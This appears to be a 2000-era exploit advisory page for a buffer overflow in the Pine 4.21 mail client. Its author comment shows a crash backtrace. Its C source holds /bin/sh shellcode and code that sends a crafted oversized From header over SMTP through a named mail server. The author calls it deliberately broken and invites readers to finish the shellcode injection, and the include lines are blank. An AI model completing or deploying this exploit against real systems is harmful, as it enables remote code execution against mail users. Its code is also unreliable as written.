|
Home : Advisories : PINE Exploit 4.21
Title: |
PINE Exploit 4.21 |
Released by: |
|
Date: |
25th September 2000 |
Printable version: |
Click here |
/*############## ##### ###### ## # ## # # # # # #
# #
# PINE Exploit 4.21 [ bTm ] #
# #
Proof of Concept: Pine 4.21
There exists a vulnerability in Pine 4.21 involving the
portion of code in charge of peroidically checking email
when a pine client is open.
Run pine in one window, then send an email to the account
owning that session. Switch back over and hit [Control+L]
(to check your mail).
Woohoo!
now open the core up in gdb:
#2 0x40084098 in abort () at ../sysdeps/generic/abort.c:139
#3 0x817470c in strcpy () at ../sysdeps/generic/strcpy.c:43
#4 0x8137f82 in strcpy () at ../sysdeps/generic/strcpy.c:43
#5 0x8158760 in strcpy () at ../sysdeps/generic/strcpy.c:43
#6 0x40082c28 in __restore ()
at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#7 0xe7e2bfff in ?? ()
Cannot access memory at address 0xe7e2bfff.
Oops, my alignment could use some work.
Hello's : Mega,Loki,Lamagra,and zen-parse.
BTW: this is broken, you have to figure it out on your own how
to smuggle the shellcode in.
Any real Pentester can get this working fairly quickly.
Just be polite, don't forget to say HELO!
Arkane [bTm]
######### ### # ## # # ## # # ## # # # # # # # ### ## ## */
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned long get_sp (void)
{
__asm__ ("mov %esp, %eax");
}
#define ADDRLEN 700
#define EXECLEN 1000
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main (int argc, char **argv)
{
struct sockaddr_in server;
struct hostent *hp;
int s;
char helo[100];
char mail[100];
char rcpt[100];
char data[2500];
char start[20];
int offset = 0;
unsigned long addr;
int i;
char *addrs,*exec;
addrs = (char *) malloc (ADDRLEN);
exec = (char *) malloc (EXECLEN);
if(argc < 2)
{
printf(" Usage: %s \n", argv[0]);
printf(" \n\n");
exit(0);
}
if (argc == 3)
offset = atoi (argv[2]);
//addr = get_sp () - offset;
addr = 0xbfffe7e2; //RH62
memset(addrs,0x41,ADDRLEN);
// for (i = 0; i < ADDRLEN ; i += 4)
// *(unsigned *) &addrs[i] = addr;
// memset(exec,0x90,EXECLEN);
// memset(addrs+195,0x90,5);
// memcpy (addrs + 200, shellcode, strlen (shellcode));
if((hp = gethostbyname ("mail.speakeasy.org")) == NULL) {
printf ("Could not resolve mail.speakeasy.org.\n");
exit(1); }
if((s = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Error");
exit(1); }
server.sin_family = AF_INET;
server.sin_port = htons (25);
server.sin_addr.s_addr = *(u_long *) hp->h_addr;
bzero (&(server.sin_zero), 8);
if(connect(s, (struct sockaddr *) &server, sizeof (struct sockaddr)) == -1) {
printf ("Connection refused\n");
exit(1); }
sprintf (helo, "helo test\r\n");
sprintf (mail, "mail from: %s\r\n",argv[1]);
send (s, helo, strlen (helo), 0);
send (s, mail, strlen (mail), 0);
sprintf (rcpt, "rcpt to: %s\r\n",argv[1]);
send (s, rcpt, strlen (rcpt), 0);
sprintf(start,"data\r\n");
send (s, start, strlen (start), 0);
fprintf(stderr," Message Sent! \n");
sprintf(data,"From: %s AAAAAAAA test@test.net\r\n%s\r\n.\r\nquit\r\n",addrs,exec);
send (s, data, strlen (data), 0);
close (s);
exit(0);
}
|